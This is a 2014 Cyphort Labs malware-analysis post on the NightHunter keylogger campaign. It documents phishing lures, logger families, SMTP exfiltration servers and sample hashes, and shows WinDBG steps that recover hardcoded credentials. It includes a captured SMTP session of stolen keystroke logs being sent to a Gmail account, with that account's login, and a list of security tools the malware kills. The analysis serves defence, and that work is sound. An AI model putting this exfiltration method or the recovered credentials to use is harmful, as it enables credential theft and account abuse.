NightHunter: Massive campaign to steal credentials revealed

Posted on July 9, 2014 by McEnroe Navaraj

NightHunter Cyphort Labs has discovered an extensive data theft campaign that we have named Nighthunter. The campaign has been active since 2009 and is designed to steal login credentials of users.

· Campaign is amassing login credentials of users. At this point it does not seem likely that they are targeting specific organization or industries. We have seen threat activity across several verticals including energy, education, insurance and even charities.

· Targeted applications include Google, Yahoo, Facebook, Dropbox and Skype.

· Intent of data collection is unknown but attackers have many options to leverage the credentials and the potential for analyzing and correlating the stolen data to mount highly targeted, damaging attacks is high.

· NightHunter uses SMTP (email) for data exfiltration instead of more common CnC mechanisms that use web protocols. This could be to simply “hide (and steal data) in the plain sight” as organizations beef up web anomaly detection for dealing with advanced attacks.

To learn more about the campaign, join us on our webinar on Thursday, July 31, 2014 9:00 AM PDT http://info.cyphort.com/mmwjuly

It involves several different malware keyloggers, including Predator Pain, Limitless, and Spyrex. The unifying feature is that they all use SMTP (email) for data exfiltration. Email to social networking is like snail-mail is to email, it is outdated and often overlooked, so it can be a more stealthy way of data theft. So we called it NightHunter.

NightHunter is very aggressive at stealing and sending home the users’ passwords. The actors behind NightHunter can use the trove of stolen credentials to leverage big data analytics and enable new cyber threats, for purposes of extortion, credit card or bank fraud, stealing state secrets or corporate espionage.

Our investigation started with a sample delivered through a phishing email. It is a .Net binary and when executed it steals users’ credentials and sends them to a remote email server. It seems like a naive technique to most of the existing “advanced” security products. When we looked into the sample, we found additional “similar” samples. We followed the trail and examined the data it exfiltrated to the remote servers.

The NightHunter data theft campaign is believed to have been active since at least 2009, targeting energy firms, educational institutions, hospitals and charities and other enterprises.

Common Delivery Mechanism :

These samples are delivered mostly through phishing emails. These emails are sent with DOC/ZIP/RAR attachments. You can get infected by opening a malicious document with scripting enabled. Most of the phishing emails are targeted towards personnel in finance/sales/HR departments. Sometimes actors may act as goods resale agents. We have seen cases where it was bundled with fake IDM/7zip installers. Most of these samples used keylogger tools to sniff data from the victim.

Nighthunter-1 Nighthunter-2 Nighthunter-3 Nighthunter-4

Most common Phishing Email subject/attachment names:

1. WireSlip

2. Jobs List

3. PO

4. Reconfirm Pls

5. Purchase Order

6. Payment Slip

7. Order

8. Inquiry

9. Remittance Payment Slip

Types of Stolen Credentials:

1. Google

2. Facebook

3. Dropbox

4. Yahoo

5. Hotmail

6. Amazon

7. Skype

8. LinkedIn

9. Banks

10. Rediff

Victims Industries:

1. Oil industry

2. Charities

3. Educational Institutes

4. Hospitals

5. Departmental Stores

6. Auditors

7. Export/Import Companies.

8. Insurance Companies

9. TV Network

10. Trading Companies

List of keylogger malware used:

1. Limitless logger lite (http://limitlessproducts.org/)

2. Predator Pain

3. Keylogger Logları (SlloTBan)

4. Spyrex

5. FEDERIKO\'s Logger

6. Unknown Logger Public

7. Aux Logger

8. Neptune

9. Mr. Clyde Logger

10. Ultimate Logger

11. MY Ultimate Jobe

12. Syslogger

13. Syndicate Logger (http://syndicateproducts.org)

We are seeing Limitless keylogger many places. Next to the Limitless logger, Predator Pain is popular within the actors. Considering the low cost of the tool, easy setup, quality of virus generator and features it supports, we are seeing increasing interest with the actors. Though Limitless Logger is closed down, it was used heavily.

Most of the keyloggers used provide following features:

- E-Mail/PHP/FTP upload

- Obfuscation

- Spoof Extension and Change Icon

- Clear Browser Data

- Fake Error Message

- Capture Screenshot

- Disable many programs

- Various spreading mechanism

- File Downloader

- Block various websites

- Self-delete

Data Stealing:

- Bitcoin Stealing

- Password managers

- Firefox/Google Chrome/IE/Safari/Opera

- Outlook

- Pidgin/Trillian/Paltalk/AIM/IMVU

- Various Games and Game Bots

- Filezilla/Flashfxp/CoreFTP/SmartFTP/FTP Commander

One of the samples (f997f9bdf00d82a42cb0985c803a0ba1ba0c7faf0b69b0d4a1888f6d1f46d210), even printed out the activity details to the console.

Nighthunter-5

List of Email servers and Number of samples using particular Email server:

Email Server

Sample Count

First Seen

Last seen

smtp.googlemail.com/smtp.gmail.com

2,500

2009

Today

smtp.mail.ru

228

2010-10-08

2014-06-13

smtp.live.com

151

2010-08-24

2014-06-12

mx1.3owl.com

82

2012-09-10

2014-06-05

smtp.mail.com

42

2011-04-20

2014-06-12

smtp.yandex.com/smtp.yandex.ru

39

2010-12-20

2014-06-12

smtp.turkceventrilo.com

38

2014-04-02

2014-06-04

smtp.mail.yahoo.com

25

2013-02-15

2014-06-13

mail.drmike.com.de

31

2014-04-06

2014-05-29

smtp.aol.com

13

2010-10-27

2014-06-06

smtp.comcast.net

18

2013-05-31

2014-06-12

smtp-mail.outlook.com

1

2014-05-23

smtp.list.ru

1

2014-06-09

smtp.hanco-ltd.biz

10

2014-04-04

2014-06-10

mail.ieindia.org

7

2014-04-29

2014-06-10

mail.npcuae.com

1

2014-06-08

smtp.bilatraders.com

1

2014-06-04

mail.persian-trading.com

5

2014-05-25

2014-06-06

smtp.poczta.onet.pl

2

2012-06-02

2014-06-09

relay.skynet.be

1

2014-06-04

Smtp.interia.pl

1

2014-06-06

mx.freenet.de

1

2014-06-05

cloud73.dotcanada.com

2

2014-04-29

2014-05-30

smtp.bk.ru

5

2014-04-21

2014-05-26

master.torguard.tg

3

2014-05-16

2014-05-23

poczta.o2.pl

4

2014-03-21

2014-05-31

smtp.web.de

2

2011-07-03

2014-04-11

mail.snookiezinc.com.de

1

2014-03-18

mail.atbinco.com

2

2014-05-09

smtps.bol.com.br

2

2014-04-15

2014-05-26

mail.glintcosmetics.com

2

2014-04-25

2014-06-11

Gmail seems to be the most popular email server used by the criminals to “park” the victim data in recent times. The reason for larger number of samples using Gmail is probably (or likely) due to the popularity of Gmail and because most security products somehow “whitelist” Google/Gmail traffic/activity making it easy to hide this email in the volume of emails sent out to Gmail. Another possible reason is that Gmail imposes a lot of restrictions, such as how many emails a particular account can send on a particular day requiring actors to keep sending new malware with new accounts.

Nighthunter-6

The number of samples the actors sent for other email servers is very low. We believe some of the servers were hacked to create an email account. In some cases actors created their own email server. For example, the email server of The Institution of Engineers (ieindia.org) was hacked to create two accounts and used to park the victim data mostly from India. Some of these samples that used private email servers were active for only a few weeks.

Most of the virus generator tools provide various options to exfiltrate data from the victim machine, such as like Email, FTP and PHP upload. Looking at the patterns most of these actors started with PHP upload and then moved to Email. Analysis of recent malware samples reveals that most of the actors started to use only Email. Very few malware samples used multiple methods to exfiltrate the data like FTP and Email.


mx1.3owl.com

First Seen Date

Infection Count

Keylogger

6/5/2014

2

Predator Pain

6/4/2014

31

Predator Pain

6/4/2014

47

Predator Pain

6/3/2014

10

Predator Pain

6/3/2014

15

Predator Pain

6/3/2014

33

Predator Pain

6/2/2014

2

Predator Pain

6/2/2014

50

Predator Pain

6/2/2014

2

Predator Pain

6/1/2014

33

Predator Pain

5/30/2014

7

Predator Pain

5/25/2014

44

Predator Pain

5/20/2014

6

Predator Pain

5/17/2014

5

Mr. Clyde Logger and Predator

5/15/2014

26

5/12/2014

5

Mr. Clyde Logger and Predator

5/11/2014

39

Predator Pain

5/8/2014

59

Predator Pain

5/7/2014


5/6/2014

6

Predator Pain

5/2/2014

20

Predator Pain, Limitless Logger

4/24/2014

37

Predator Pain

4/23/2014

57

Predator Pain, Limitless Logger

4/22/2014

57

57

Predator Pain, Limitless Logger

Predator Pain, Limitless Logger, MY Ultimate Jobe

4/17/2014

57

57

14

Predator Pain, Limitless Logger

Predator Pain, Limitless Logger, MY Ultimate Jobe

Predator Pain

4/16/2014

4/15/2014

1

Predator Pain

4/10/2014

73

Predator Pain, Limitless Logger

4/9/2014

73

Predator Pain, Limitless Logger

Limitless Logger

4/5/2014

57

Predator Pain, Limitless Logger

Limitless Logger

Predator Pain, Limitless Logger

4/3/2014

42

3/27/2014

73

2/18/2014

1

Predator Pain

1/28/2014

57

Predator Pain, Limitless Logger, MY Ultimate Jobe


Actors behind these malware samples (35 out of 82) followed similar techniques while registering domains. Author’s identity is hidden to the analyst.

Nighthunter-7

List of Samples we looked into and related to mx1.3owl.com

62F3DF70D746C898A3A5ACAD1EB6117F

5DAB1479F63376739DFE0F8140F3263E

0C25431D2B13C99AFC0DE7338E9A3ACE

BDC5A619BC2D96616D900DFEBC2D21E7

845EFE43B05A7334B0AE8CB39C6AA4E5

3164A660B54EBE994B467D765465D23C

09423D5E22289F0F8E31FE4FC2DA0A25

416CE138B5F02F00253FC08989A9CD12

DE59FB78752DE040010EDA63667C26CA

CEC37293C2ADF3C9EECA7EE14979BDAD

26D13E5412D282DA91E4053D92B34271

3CE8C9743D9F523009CA84CD3B12B1B8

71AC33835389B800FE5BDB69786A62B8

3831B1FCE2B1CDC662262D389529A298

8117AAA51EE22F13E817F67E7A816F48

28F718CCE2D22F61108B580746CFD810

736A752D2B0B96741213404177DBD8F6

DEFB1E6E42EDC46FA9630CDF42C347F9

5EFF0A000B0B63D67BD3F9BBFB8991D0

207A9A92C697E83B21FC44E4DF0247AD

7D9F321A673266B4BDE3F48CE132A81E

D0D13CDAB7EE6DC22A52FBB0A2FA5F16

31D0DD3ADBE378F8BF3D13FC0BF69D51

C475E64740710B398F458710E7CBF3FD

F4E7CC408B9902A92181BF46282C46DD

0AA6E7204A3DBA4EBE6F81331FF9EF3B

9716665CB4F603C4D1CA96D7CC7A555C

0E4FA8AB9CF7C64714C436735D68E1F0

B699A3FE2B531139FAB267689B3CEF14

B7103ED3D263578FA26E06C9E6ADBD21

A514FCBDF47C0829843A1C03D1061F28

9350F7B4513198F86987F36A8D400D34

AD9A3311486DF3B7B457779EA486BC5D

9A285873E25F43085D9DE5FCA4D898D5

77CF51DA449598A43CF030A7EC9F223E

4BD63A33567A9EAF80D0E0730DE6AB0A

D1683408FEFA12BB93FC15CE2DEDD7C7

7AD0EABC5B9D6F6B1A7BE35B75F68681


mail.ieindia.org:

All the samples related to this email server were active for only a few weeks. This was targeted towards people from India. Actors used Limitless logger to extract the information from the victims. Analysts believe that actors hacked into their email server and created two email accounts to park their data. Victims were from different industries.

70b0e2fb1e54d16f96d11685c81071361afb66523c3c81b054344c21df1bd6ec

2014-06-10

db3b52afd523055cabcc0df3c9f0eeced65e627fd2f7e2b9d4d8e0f5c6141f42

2014-06-03

8dfdd1f019c2b4c3d4bc9fb6a8e15b7a4cca916a5540c7dae65f83c4ec60b2e7

2014-06-02

9a71df6f73875488754583f53e6caf9c654526fc55c09c4d4b57003788b844c4

2014-05-09

aea5e5650fb857b1675fe68eb7f102e7695322a70defce79f59a72f3f34ea6c4

2014-05-29

75b4e7f2917dd18ce7d2d4a9238b5b8072b997ff2634444d0a43b69acc1f14ea

2014-05-28

584e6f7326ee93f1f03cca1014263bcef007fcfa6d527a77cb040b20e165bb4a

2014-04-29


Manual Analysis

Most of the samples we manually analyzed included a lot of obfuscation techniques used to delay the analysis. We will be looking at static analysis details of this sample (MD5: cfb72c025bc99733a7f0c21242738a57) and other related samples.

Anti-analysis techniques used:

1. Use non-printable characters as a class/variable names in the code.

2. Use Assmbly.Load() function to load a different assembly.

3. Strings in the code are encoded using various methods. (We found almost 10 different methods.)

4. Various product detection code.

5. Debugger detection code.

We looked into the binary using various .Net disassemblers. Most of the disassemblers didn’t work for most of the binaries. Using ILSpy we analyzed this binary. Internally it decoded another assembly from its resource section and loaded it.

Nighthunter-8

We decided to dump the second stage using the WinDBG. Most of the first stage binary did not use a debugger detection or security product detection code, but the second stage does.

0:000> sxe ld:mscorlib

0:000> sxe ld:mscorjit

0:000> g

0:000> .loadby sos mscorwks

0:000> !bpmd mscorlib.dll System.AppDomain.Load

0:000> g

0:000> !clrstack -a

OS Thread Id: 0xc64 (0)

ESP EIP

0045ed38 67f0736c System.AppDomain.Load(Byte[])

PARAMETERS:

this = 0x02851268

rawAssembly = 0x02879c04

LOCALS:

<no data>

0045ed3c 00341c55 jhgfdertyui.iuytrdfghj.Form1_Load(System.Object, System.EventArgs)

PARAMETERS:

this = <no data>

sender = <no data>

e = <no data>

LOCALS:

<no data>

0x0045ed3c = 0x02879c04

0:000> !da 0x02879c04

Name: System.Byte[]

MethodTable: 67ac37b8

EEClass: 6787eb8c

Size: 32268(0x7e0c) bytes

Array: Rank 1, Number of elements 32256, Type Byte

Element Methodtable: 67ac3868

[0] 02879c0c

...

[32255] 02881a0b

0:000> .writemem c:\tmp\secondstage.bin 02879c0c L0n32255

Writing 7dff bytes................

The second stage binary was again obfuscated. It used a lot of variables with nonprintable characters. Since we were not able to set breakpoints in the windbg, we decided to do dynamic analysis on the binary. This binary tried to persist in the system using autorun registry modification. It first tried to connect to a remote server (depends on the binary) to find the external IP address and send an Email to remote server.

Nighthunter-9

It connected to a remote email server (mx1.3owl.com) and sent an email with victim information. It used Predator Pain v14 keylogger. We extracted the email credentials from the network traffic.

Let’s look into other similar binaries that included credentials in plain text in the original sample itself.

MD5: 3d7fee36dcd7f1e6bed77d6d9648ada5d899d3efc8dc1d1fd605f75c065cf84d

Email credentials were hidden at the end of file.

Nighthunter-10

Some binaries looked for a few security products installed in the machine. If they found any security products, they hid their own window and killed the security product.

Nighthunter-11

All this detection looks for particular process name.

AntiKeyscrambler() -> keyscrambler

AntiWireshark() -> wireshark

AntiAnubis() -> anubis

AntiMalwarebytes() -> mbam

AntiKaspersky() -> avp

AntiOllydbg() -> ollydbg

AntiOutpost() -> outpost

AntiNorman() -> npfmsg

AntiBitDefender() -> bdagent

AntiNOD32() -> egui

We used windbg to dump the credentials for some of the samples that did not do debugger detection.

0:000> sxe ld:mscorlib

0:000> sxe ld:mscorjit

0:000> sxe ld:System.Windows.Forms.dll

0:000> g

ModLoad: 00000000`6f680000 00000000`6fb4e000 System.Windows.Forms.dll

ntdll!ZwMapViewOfSection+0xa:

00000000`77a6153a c3 ret

0:000> .loadby sos mscorwks

0:000> .symfix

0:000> ld system_ni

0:000> !bpmd System.dll System.Net.NetworkCredential..ctor

0:000> !bpmd System.dll System.Net.NetworkCredential..ctor

Found 4 methods...

Setting breakpoint: bp 000007FEEA84F490 [System.Net.NetworkCredential..ctor()]

Setting breakpoint: bp 000007FEEA3D6B10 [System.Net.NetworkCredential..ctor(System.String, System.String)]

Setting breakpoint: bp 000007FEEA84F4A0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String)]

Setting breakpoint: bp 000007FEEA84F4C0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String, Boolean)]

0:000> g

Breakpoint 1 hit

System_ni+0x236b10:

000007fe`ea3d6b10 53 push rbx

0:000> !dumpobj -nofields rdx

Name: System.String

MethodTable: 000007feeb007d90

EEClass: 000007feeac0e560

Size: 66(0x42) bytes

(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)

String: alinsterpu@gmail.com

0:000> !dumpobj -nofields r8

Name: System.String

MethodTable: 000007feeb007d90

EEClass: 000007feeac0e560

Size: 46(0x2e) bytes

(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)

String: hainerosii

Most of the binaries used TCP/587 to send emails to the remote server. Some binaries associated with mx1.3owl.com used TCP/2525 to send emails. We retrieved most of the credentials using dynamic analysis including Gmail. Gmail used encrypted channel to communicate to the remote server. Since the number of samples that used Gmail was high, we decided to MITM the Gmail traffic in our malware lab.

S->C 53 b'220 mx.google.com ESMTP ec2sm20231912pbc.63 - gsmtp\r\n'

C->S 16 b'EHLO test-PC\r\n'

S->C 137 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'

C->S 10 b'STARTTLS\r\n'

S->C 30 b'220 2.0.0 Ready to start TLS\r\n'

Wrapping sockets.

C->S 16 b'EHLO test-PC\r\n'

S->C 178 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'

C->S 41 b'AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n'

S->C 18 b'334 UGFzc3dvcmQ6\r\n'

C->S 18 b'aGFpbmVyb3NpaQ==\r\n'

S->C 20 b'235 2.7.0 Accepted\r\n'

C->S 34 b'MAIL FROM:<alinsterpu@gmail.com>\r\n'

S->C 42 b'250 2.1.0 OK ec2sm20231912pbc.63 - gsmtp\r\n'

C->S 32 b'RCPT TO:<alinsterpu@gmail.com>\r\n'

S->C 42 b'250 2.1.5 OK ec2sm20231912pbc.63 - gsmtp\r\n'

C->S 6 b'DATA\r\n'

S->C 43 b'354 Go ahead ec2sm20231912pbc.63 - gsmtp\r\n'

C->S 228 b'MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n'

C->S 48 b'keylogger started at: 6/17/2014 1:24:43 AM=0D=0A'

One of the sample we analyzed (MD5: 8962ca1997193be3931c41983cc4600e941d40bdb0fdddafa00f3761feeb4ba8) used both Email and FTP to exfiltrate data from the users machine.

Nighthunter-12

Most of the samples used code level obfuscation to delay the analysis. In the end, we got 10 different methods (decoding/decryption) to decode various strings. No wonder these samples were created using similar virus generator tools.

NightHunter is one the more unique campaigns we have researched at Cyphort due to the footprint and complex data collection models it exhibits, furthermore the use of low-signal evasion it is leveraging such as webmail for data exfiltration points to much larger end-goal. This points to the shifting "Tradecraft" being adopted by actors leveraging BigData models to mine more interesting and strategically suitable data, whether it being for direct and targeted attacks or providing highly actionable content to other actors for economic benefits.